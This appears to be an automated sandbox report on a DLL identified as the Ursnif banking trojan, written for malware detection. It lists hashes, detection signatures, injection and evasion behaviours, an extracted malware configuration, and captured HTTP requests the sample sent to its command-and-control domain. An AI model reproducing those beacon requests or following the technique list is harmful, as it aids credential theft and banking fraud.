Analysis Report yytr.dll

Overview

General Information

Sample Name: yytr.dll
Analysis ID: 350433
MD5: ba2befa9c70c2b6d779c48a59cece3e5
SHA1: 4c855f80076e357d35c7d60cd52d2c49abefc5ff
SHA256: 9c51cbe4681facc34623aeca27a18dbaa6db1337990a0e003b7c9babeb06c1eb

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Contains functionality to detect sleep reduction / modifications
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Found malware configuration
Source: loaddll32.exe.5964.0.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@618321hh", "dns": "618321", "version": "250177", "uptime": "372", "crc": "2", "id": "3131", "user": "4229768108f8d2d8cdc8873a70351dbe", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: yytr.dll Virustotal: Detection: 43%
Source: yytr.dll ReversingLabs: Detection: 39%
Machine Learning detection for sample
Source: yytr.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.f50174.3.unpack Avira: Label: TR/Kazy.4159236
Source: 1.2.rundll32.exe.4520174.4.unpack Avira: Label: TR/Kazy.4159236

Compliance:

Uses 32bit PE files
Source: yytr.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2
Binary contains paths to debug symbols

Spreading:

Contains functionality to get notified if a device is plugged in / out
Source: C:\Windows\explorer.exe Code function: 37_2_04DB9064 RegisterDeviceNotificationA, 37_2_04DB9064
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_004051E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F37AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02F37AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 1_2_004051E8
Source: C:\Windows\explorer.exe Code function: 37_2_04DBA0C4 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_04DBA0C4
Source: C:\Windows\explorer.exe Code function: 37_2_04DBEEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW, 37_2_04DBEEAC
Source: C:\Windows\explorer.exe Code function: 37_2_04DB537C FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege, 37_2_04DB537C

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.67.231.135: -> 192.168.2.4:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: C:\Windows\explorer.exe Code function: 37_2_04DB2690 InternetReadFile, 37_2_04DB2690
Source: global traffic HTTP traffic detected:
  GET /manifest/0Ru5_2BN/vJgRf6V8sbRC064gj9umjfq/qGksViZKyK/CLTbbr_2Frwl7IIUm/2WgRCjkUmuV8/iqgLjW1thwy/gJZQmwxnV_2BDM/Wr8pQO7reeN1b6Kt1HCeS/XjNtvAuY9ME_2BeN/LgpsYgJYXFXyrGm/d7KSfhzGcV8NWQ7ppv/9EulZOHC5/KtUCLTDeST800go2ZMVb/VjoLNr.snx HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: pronpepsipirpyamvioerd.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: pronpepsipirpyamvioerd.com
  Connection: Keep-Alive
  Cookie: PHPSESSID=eshdo6go4uelgf2o7eta3f2t14; lang=en
Source: global traffic HTTP traffic detected:
  GET /manifest/NYuAqVunzg8xaQkjvT46w/1VWG9VjwQgEgBMZm/Edmv_2B8LPKApUf/y1_2FkkZHFAdOsdYZs/d_2Fil_2B/2sLNxYxtzdQxXGXvTOBx/XjwkkSX2ErFOwgwZnhQ/X4rzMPZ_2BQqzPEaol9dkp/NXUXbdRpfvyEv/malx3f_2/F5Dcl9KMBZOba09lPIsxEXU/75awVY4snO/mAGP3ya11/S.snx HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: pronpepsipirpyamvioerd.com
  Connection: Keep-Alive
  Cookie: lang=en
Source: global traffic HTTP traffic detected:
  GET /manifest/B6BYv9zhM9/Ha3CHkPLo3mXozKfC/o_2FE8j69Cu2/vMtBWo7v_2B/K717OxVgHzGizO/XIuLXZu8qkAN2wMJkptv8/1QwAgfct_2FjngCz/DuCEjb4kUB5NNhB/qR0_2FpSaJDi7blpKM/fBK5rghxV/R_2BqBsae2XxsQIQFD_2/FNGXxVdkHEUOrk_2FKw/pFfmknmoACymtAa0UoGCEX/7h.snx HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: pronpepsipirpyamvioerd.com
  Connection: Keep-Alive
  Cookie: lang=en
Source: unknown DNS traffic detected: queries for: assets.onestore.ms
Source: loaddll32.exe, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001E.00000003.825326086.0000026F5A0BB000.00000004.00000001.sdmp String found in binary or memory: http://crl.micr
Source: WerFault.exe, 00000004.00000003.659243979.0000000005012000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.894428484.0000026F5BAB1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
Contains functionality to record screenshots
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004225C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 1_2_004225C8
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00449950 GetKeyboardState, 0_2_00449950

E-Banking Fraud:

Yara detected Ursnif
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044C8CC NtdllDefWindowProc_A,GetCapture, 0_2_0044C8CC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042863C NtdllDefWindowProc_A, 0_2_0042863C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044281C GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 0_2_0044281C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439348 NtdllDefWindowProc_A, 0_2_00439348
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00439AF0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00439BA0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C914E8 NtCreateSection,memset, 0_2_02C914E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C9183B NtMapViewOfSection, 0_2_02C9183B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C922C5 NtQueryVirtualMemory, 0_2_02C922C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F372D8 NtMapViewOfSection, 0_2_02F372D8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F31371 GetProcAddress,NtCreateSection,memset, 0_2_02F31371
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F37507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_02F37507
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F3B2F1 NtQueryVirtualMemory, 0_2_02F3B2F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044C8CC NtdllDefWindowProc_A,GetCapture, 1_2_0044C8CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0042863C NtdllDefWindowProc_A, 1_2_0042863C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044281C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 1_2_0044281C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439348 NtdllDefWindowProc_A, 1_2_00439348
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 1_2_00439AF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 1_2_00439BA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_045422C5 NtQueryVirtualMemory, 1_2_045422C5
Source: C:\Windows\explorer.exe Code function: 37_2_04DA14D0 NtQueryInformationProcess, 37_2_04DA14D0
Source: C:\Windows\explorer.exe Code function: 37_2_04DC20B4 NtQueryInformationProcess, 37_2_04DC20B4
Source: C:\Windows\explorer.exe Code function: 37_2_04DC4064 NtMapViewOfSection, 37_2_04DC4064
Source: C:\Windows\explorer.exe Code function: 37_2_04DA7008 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 37_2_04DA7008
Source: C:\Windows\explorer.exe Code function: 37_2_04DA5DF4 RtlAllocateHeap,NtCreateSection, 37_2_04DA5DF4
Source: C:\Windows\explorer.exe Code function: 37_2_04DC7278 NtWriteVirtualMemory, 37_2_04DC7278
Source: C:\Windows\explorer.exe Code function: 37_2_04DA527C NtAllocateVirtualMemory, 37_2_04DA527C
Source: C:\Windows\explorer.exe Code function: 37_2_04DB6A74 NtQuerySystemInformation, 37_2_04DB6A74
Source: C:\Windows\explorer.exe Code function: 37_2_04DB2FD0 NtQueryInformationProcess, 37_2_04DB2FD0
Source: C:\Windows\explorer.exe Code function: 37_2_04DBFF54 NtReadVirtualMemory, 37_2_04DBFF54
Source: C:\Windows\explorer.exe Code function: 37_2_04DAEF1C NtSetContextThread,NtUnmapViewOfSection,NtClose, 37_2_04DAEF1C
Source: C:\Windows\explorer.exe Code function: 37_2_04DB4B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification, 37_2_04DB4B24
Source: C:\Windows\explorer.exe Code function: 37_2_04DDA002 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_04DDA002
Source: C:\Windows\System32\control.exe Code function: 38_2_00117008 NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_00117008
Source: C:\Windows\System32\control.exe Code function: 38_2_00134064 NtMapViewOfSection, 38_2_00134064
Source: C:\Windows\System32\control.exe Code function: 38_2_001320B4 NtQueryInformationProcess, 38_2_001320B4
Source: C:\Windows\System32\control.exe Code function: 38_2_001114D0 NtQueryInformationProcess, 38_2_001114D0
Source: C:\Windows\System32\control.exe Code function: 38_2_00115DF4 NtCreateSection, 38_2_00115DF4
Source: C:\Windows\System32\control.exe Code function: 38_2_00137278 NtWriteVirtualMemory, 38_2_00137278
Source: C:\Windows\System32\control.exe Code function: 38_2_0011527C NtAllocateVirtualMemory, 38_2_0011527C
Source: C:\Windows\System32\control.exe Code function: 38_2_0011EF1C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_0011EF1C
Source: C:\Windows\System32\control.exe Code function: 38_2_00124B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_00124B24
Source: C:\Windows\System32\control.exe Code function: 38_2_0012FF54 NtReadVirtualMemory, 38_2_0012FF54
Source: C:\Windows\System32\control.exe Code function: 38_2_0014A002 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_0014A002
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044281C 0_2_0044281C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00433840 0_2_00433840
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C920A4 0_2_02C920A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F323FC 0_2_02F323FC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F3936B 0_2_02F3936B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044281C 1_2_0044281C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00433840 1_2_00433840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_045420A4 1_2_045420A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_04521618 1_2_04521618
Source: C:\Windows\explorer.exe Code function: 37_2_04DC0CDC 37_2_04DC0CDC
Source: C:\Windows\explorer.exe Code function: 37_2_04DBA0C4 37_2_04DBA0C4
Source: C:\Windows\explorer.exe Code function: 37_2_04DA58FC 37_2_04DA58FC
Source: C:\Windows\explorer.exe Code function: 37_2_04DB2080 37_2_04DB2080
Source: C:\Windows\explorer.exe Code function: 37_2_04DAA8B8 37_2_04DAA8B8
Source: C:\Windows\explorer.exe Code function: 37_2_04DB059C 37_2_04DB059C
Source: C:\Windows\explorer.exe Code function: 37_2_04DBE178 37_2_04DBE178
Source: C:\Windows\explorer.exe Code function: 37_2_04DB3520 37_2_04DB3520
Source: C:\Windows\explorer.exe Code function: 37_2_04DC36F4 37_2_04DC36F4
Source: C:\Windows\explorer.exe Code function: 37_2_04DBAE94 37_2_04DBAE94
Source: C:\Windows\explorer.exe Code function: 37_2_04DA16B4 37_2_04DA16B4
Source: C:\Windows\explorer.exe Code function: 37_2_04DA7A0C 37_2_04DA7A0C
Source: C:\Windows\explorer.exe Code function: 37_2_04DB537C 37_2_04DB537C
Source: C:\Windows\explorer.exe Code function: 37_2_04DAEF1C 37_2_04DAEF1C
Source: C:\Windows\explorer.exe Code function: 37_2_04DC40F8 37_2_04DC40F8
Source: C:\Windows\explorer.exe Code function: 37_2_04DA3088 37_2_04DA3088
Source: C:\Windows\explorer.exe Code function: 37_2_04DBE87C 37_2_04DBE87C
Source: C:\Windows\explorer.exe Code function: 37_2_04DC5010 37_2_04DC5010
Source: C:\Windows\explorer.exe Code function: 37_2_04DA4828 37_2_04DA4828
Source: C:\Windows\explorer.exe Code function: 37_2_04DC2994 37_2_04DC2994
Source: C:\Windows\explorer.exe Code function: 37_2_04DAD590 37_2_04DAD590
Source: C:\Windows\explorer.exe Code function: 37_2_04DB154C 37_2_04DB154C
Source: C:\Windows\explorer.exe Code function: 37_2_04DAB170 37_2_04DAB170
Source: C:\Windows\explorer.exe Code function: 37_2_04DA6168 37_2_04DA6168
Source: C:\Windows\explorer.exe Code function: 37_2_04DADD18 37_2_04DADD18
Source: C:\Windows\explorer.exe Code function: 37_2_04DAAD03 37_2_04DAAD03
Source: C:\Windows\explorer.exe Code function: 37_2_04DB8504 37_2_04DB8504
Source: C:\Windows\explorer.exe Code function: 37_2_04DB0134 37_2_04DB0134
Source: C:\Windows\explorer.exe Code function: 37_2_04DA66D0 37_2_04DA66D0
Source: C:\Windows\explorer.exe Code function: 37_2_04DA1AD0 37_2_04DA1AD0
Source: C:\Windows\explorer.exe Code function: 37_2_04DB6E88 37_2_04DB6E88
Source: C:\Windows\explorer.exe Code function: 37_2_04DC1A30 37_2_04DC1A30
Source: C:\Windows\explorer.exe Code function: 37_2_04DABF6C 37_2_04DABF6C
Source: C:\Windows\explorer.exe Code function: 37_2_04DAB730 37_2_04DAB730
Source: C:\Windows\explorer.exe Code function: 37_2_04DB3F2C 37_2_04DB3F2C
Source: C:\Windows\explorer.exe Code function: 37_2_04DACF24 37_2_04DACF24
Source: C:\Windows\System32\control.exe Code function: 38_2_00130CDC 38_2_00130CDC
Source: C:\Windows\System32\control.exe Code function: 38_2_0012059C 38_2_0012059C
Source: C:\Windows\System32\control.exe Code function: 38_2_0011EF1C 38_2_0011EF1C
Source: C:\Windows\System32\control.exe Code function: 38_2_00135010 38_2_00135010
Source: C:\Windows\System32\control.exe Code function: 38_2_00114828 38_2_00114828
Source: C:\Windows\System32\control.exe Code function: 38_2_0012E87C 38_2_0012E87C
Source: C:\Windows\System32\control.exe Code function: 38_2_00122080 38_2_00122080
Source: C:\Windows\System32\control.exe Code function: 38_2_00113088 38_2_00113088
Source: C:\Windows\System32\control.exe Code function: 38_2_0011A8B8 38_2_0011A8B8
Source: C:\Windows\System32\control.exe Code function: 38_2_0012A0C4 38_2_0012A0C4
Source: C:\Windows\System32\control.exe Code function: 38_2_001340F8 38_2_001340F8
Source: C:\Windows\System32\control.exe Code function: 38_2_001158FC 38_2_001158FC
Source: C:\Windows\System32\control.exe Code function: 38_2_0011DD18 38_2_0011DD18
Source: C:\Windows\System32\control.exe Code function: 38_2_0011AD03 38_2_0011AD03
Source: C:\Windows\System32\control.exe Code function: 38_2_00128504 38_2_00128504
Source: C:\Windows\System32\control.exe Code function: 38_2_00120134 38_2_00120134
Source: C:\Windows\System32\control.exe Code function: 38_2_00123520 38_2_00123520
Source: C:\Windows\System32\control.exe Code function: 38_2_0012154C 38_2_0012154C
Source: C:\Windows\System32\control.exe Code function: 38_2_0011B170 38_2_0011B170
Source: C:\Windows\System32\control.exe Code function: 38_2_0012E178 38_2_0012E178
Source: C:\Windows\System32\control.exe Code function: 38_2_00116168 38_2_00116168
Source: C:\Windows\System32\control.exe Code function: 38_2_0011D590 38_2_0011D590
Source: C:\Windows\System32\control.exe Code function: 38_2_00132994 38_2_00132994
Source: C:\Windows\System32\control.exe Code function: 38_2_00117A0C 38_2_00117A0C
Source: C:\Windows\System32\control.exe Code function: 38_2_00131A30 38_2_00131A30
Source: C:\Windows\System32\control.exe Code function: 38_2_0012AE94 38_2_0012AE94
Source: C:\Windows\System32\control.exe Code function: 38_2_00126E88 38_2_00126E88
Source: C:\Windows\System32\control.exe Code function: 38_2_001116B4 38_2_001116B4
Source: C:\Windows\System32\control.exe Code function: 38_2_00111AD0 38_2_00111AD0
Source: C:\Windows\System32\control.exe Code function: 38_2_001166D0 38_2_001166D0
Source: C:\Windows\System32\control.exe Code function: 38_2_001336F4 38_2_001336F4
Source: C:\Windows\System32\control.exe Code function: 38_2_0011B730 38_2_0011B730
Source: C:\Windows\System32\control.exe Code function: 38_2_0011CF24 38_2_0011CF24
Source: C:\Windows\System32\control.exe Code function: 38_2_00123F2C 38_2_00123F2C
Source: C:\Windows\System32\control.exe Code function: 38_2_0012537C 38_2_0012537C
